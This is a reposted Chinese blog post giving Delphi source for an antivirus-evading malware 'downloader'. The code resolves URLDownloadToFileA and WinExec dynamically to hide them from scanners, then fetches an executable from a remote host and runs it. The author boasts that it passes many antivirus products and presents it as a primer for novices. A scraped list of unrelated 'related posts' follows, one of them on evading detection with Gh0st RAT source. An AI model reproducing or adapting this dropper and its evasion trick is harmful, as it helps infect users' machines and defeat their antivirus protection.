[源码]Delphi源码免杀之函数动态调用 实现免杀的下载者
- [免杀]Delphi源码免杀之函数动态调用 实现免杀的下载者
- 2013-12-30 23:44:21 来源:K8拉登哥哥's Blog
自己编译这份代码看看 过N多杀软 没什么技术含量
只是发出来给不懂的人入入门 也防止有新人老是来问
ShellApi,URLMon 单元
//Delphi动态调用API函数
procedure TForm1.Button1Click(Sender: TObject);
var
SourceFile:ansistring;
DestFile :ansistring;
down2:function(Caller: IUnknown; URL: PChar; FileName: PChar; Longint: DWORD; StatusCB: IBindStatusCallback): Longint; stdcall;
exe2:function(lpCmdLine: LPCSTR; uCmdShow: LongWord): LongWord; stdcall;
begin
SourceFile:='http://172.16.126.152/UrlDown/k8team.exe';
DestFile := 'f:\bbbaa.exe';
//原函数 下载完就执行 典型的下载者 常用函数 是个杀软都会杀得你连路都不见
//UrlDownloadToFile(nil, PChar(SourceFile), PChar(DestFile), 0, nil);
//WinExec(Pchar(DestFile),SW_SHOW); //要和原函数对应
//动态调用
@Down2:=GetProcAddress(LoadLibrary('URLMON.DLL'),'URLDownloadToFileA');
Down2(nil, PChar(SourceFile), PChar(DestFile), 0, nil);
//动态调用
@exe2:=GetProcAddress(LoadLibrary('kernel32.dll'),'WinExec');
exe2(PChar(DestFile),SW_SHOW);
end;
//=================================================================================================================
附上函数原型
URLDownloadToFile 函数
function URLDownloadToFile; external UrlMonLib name 'URLDownloadToFileA';
UrlMonLib = 'URLMON.DLL';
function URLDownloadToFile(Caller: IUnknown; URL: PChar; FileName: PChar; Reserved: DWORD; StatusCB: IBindStatusCallback): HResult; stdcall;
WinExec函数
function WinExec; external kernel32 name 'WinExec';
kernel32 = 'kernel32.dll';
function WinExec(lpCmdLine: LPCSTR; uCmdShow: UINT): UINT; stdcall;
转载于:https://www.cnblogs.com/k8gege/p/10501853.html
[源码]Delphi源码免杀之函数动态调用 实现免杀的下载者相关推荐
- C++源代码免杀之函数的动态调用
最近也在学着修改Gh0st远控的源代码,源代码免杀起来还是方便.简单.有效和简单点.针对于输入输出表盯的比较紧的杀毒软件,最有效的还是进行函数动态调用.也就是说找到函数的原定义,包括值类型和参数等等, ...
- delphi Oracle导出多个表,Oracle数据库自动备份工具(Delphi源码)
Oracle数据库自动备份工具(Delphi源码) 下载地址:http://www.blogjava.net/Files/96sd2/OraSvr.rar 『OracleBackupService』简 ...
- delphi源码转换为C++ Builder源码
本人80年代初出生,正好赶上电子信息高速发展的时代.记得刚接触的计算机高级语言就是PASCAL,但只是草草学了点语法.但开始接触C时,一发不可收拾,C->TBC->C++->BC++ ...
- delphi导入oracle数据库,Oracle数据库自动备份工具(Delphi源码)
Oracle数据库自动备份工具(Delphi源码) 下载地址:http://www.blogjava.net/Files/96sd2/OraSvr.rar 『OracleBackupService』简 ...
- 口袋Delphi源码
口袋Delphi源码 unit WgUnit; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, C ...
- 最新码支付源码+完整版+免挂监听回调+微信、支付宝、qq监控APP打包教程
码支付手机APP打包教程 码支付官网:https://pay.madanbao.com 1.打开uniapp的官网注册一个账号,网址为:www.dcloud.io/ 3.打开工具导入项目,打开mani ...
- 获取硬件信息的delphi源码(CPUID、操作系统、Mac物理地址、计算机名称、IP地址、用户名)
转载请保留本文链接地址:http://blog.csdn.net/sushengmiyan/article/details/8545673 {----------------------------- ...
- PHP微信动态二维码活码管理系统源码免授权 独立版 带充值支付
简介: 免授权 独立版 带充值支付 微信群满100人以后,就不能扫描二维码入群了怎么办? 用活码就能完美解决这个问题. 使用微信群活码工具,二维码永不过期,不受100人限制,对外统一宣传一个固定的二维 ...
- HTML五合一收款码网站源码(带35套模板)
简介: HTML五合一收款码网站源码(带35套模板)是一款基于HTML开发制作的多码合一收款码生成网站源码,支持wx支付,支付宝支付,手机扣扣支付,京东钱包,百度钱包,五合一收款,将其二维码合并为一个 ...
最新文章
- spring cloud 断路器仪表盘详解
- oracle12c 新特性,12c Oracle数据库新特性汇总
- ql的python学习之路-day10
- fork()使用(一)
- Python高级——HTTP协议
- 零基础学习前端:学习路线、学习计划、实战项目和面试题简历分享。
- 【电脑帮助】解决Wind10系统桌面没有“我的电脑”图标的问题
- Oracle分组取前n条记录
- c语言编程字符串_C编程中的字符串
- 客户说发货慢怎么回复_物流走件慢回复话术
- java木马源码_用Java编写木马程序【附源代码下载】
- 找不到Office安装路径,如何导入MathType
- Android 和风天气+腾讯地图
- 【Python】简单判定身份证是否合法、性别
- 技术术语学习之paradigm
- 使用nginx实现请求转发的功能
- 1300:鸡蛋的硬度
- 长达1.5年华强北耳机微妙体验
- 用计算机说唱的 那个男的是谁,中国十大嘻哈歌手排名:有名的rapper都有谁
- CodeForces 839A Arya and Bran